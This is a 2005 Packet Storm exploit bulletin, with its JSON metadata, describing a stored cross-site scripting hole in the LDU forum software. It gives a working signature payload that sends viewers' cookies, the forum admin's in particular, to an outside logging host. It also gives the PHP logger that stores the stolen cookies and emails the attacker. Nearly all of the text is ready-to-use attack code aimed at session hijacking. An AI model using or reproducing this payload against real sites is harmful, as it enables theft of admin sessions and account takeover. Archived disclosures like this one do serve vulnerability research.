ID PACKETSTORM:39697 Type packetstorm Reporter spyMASter Modified 2005-08-31T00:00:00
Description
`Bug finder:spyMASter
Web site:Realhackers.net
Contact:bendeniz_avci@hotmail.com
LDU has some xss vulns
Firstly you can use html codes in your signature you can get cookies with this
put your signature that code
<SCRIPT> location.href='http://site.com/log/ekle.php?c='+escape(document. cookie)</SCRIPT>
and post a topic to forum when admin look this topic she/he redirect and you can get cookie
this is codes of ekle.php you can save cookie to a with this php code
<?php
$kayit = fopen("spymaster.txt","a");
foreach($_GET as $variable => $value) {
fwrite($kayit,$variable . ": " . $value . "\n");
}
fwrite($kayit,"---------------------------\n");
fclose($kayit);
mail("bendeniz_avci@hotmail.com","your cookie ready","http://www.realhackers.net/spyoku.txt",'From: spymaster@realhackers.net');
?>
`
{"hash": "ea084ed699efdb00cddc7a98d4ab4c00e50811f30599962557916dd917df4613", "sourceHref": "https://packetstormsecurity.com/files/download/39697/lduXSS2.txt", "title": "lduXSS2.txt", "id": "PACKETSTORM:39697", "published": "2005-08-31T00:00:00", "description": "", "modified": "2005-08-31T00:00:00", "sourceData": "`Bug finder:spyMASter \nWeb site:Realhackers.net \nContact:bendeniz_avci@hotmail.com \n \nLDU has some xss vulns \nFirstly you can use html codes in your signature you can get cookies with this \nput your signature that code \n \n<SCRIPT> location.href='http://site.com/log/ekle.php?c='+escape(document. cookie)</SCRIPT> \n \nand post a topic to forum when admin look this topic she/he redirect and you can get cookie \n \nthis is codes of ekle.php you can save cookie to a with this php code \n \n \n<?php \n$kayit = fopen(\"spymaster.txt\",\"a\"); \nforeach($_GET as $variable => $value) { \nfwrite($kayit,$variable . \": \" . $value . \"\\n\"); \n} \nfwrite($kayit,\"---------------------------\\n\"); \nfclose($kayit); \nmail(\"bendeniz_avci@hotmail.com\",\"your cookie ready\",\"http://www.realhackers.net/spyoku.txt\",'From: spymaster@realhackers.net'); \n?> \n \n`\n", "reporter": "spyMASter", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "f171c84cad448fcce9714aecb31a8826"}, {"key": "modified", "hash": "654e9a5b6eef1ac7edf1a1f0fab3cb40"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "654e9a5b6eef1ac7edf1a1f0fab3cb40"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "71a38b3253730f064113bd6c558c4cbe"}, {"key": "sourceData", "hash": "525c70c14bf027cfac6ec819ec73cd01"}, {"key": "sourceHref", "hash": "72fc6849635785bfab7c78614e216520"}, {"key": "title", "hash": "bbe9ebe8c8c477ed7c59f054e8626c8c"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/39697/lduXSS2.txt.html", "lastseen": "2016-11-03T10:29:21", "viewCount": 0, "enchantments": {"vulnersScore": 7.5}}
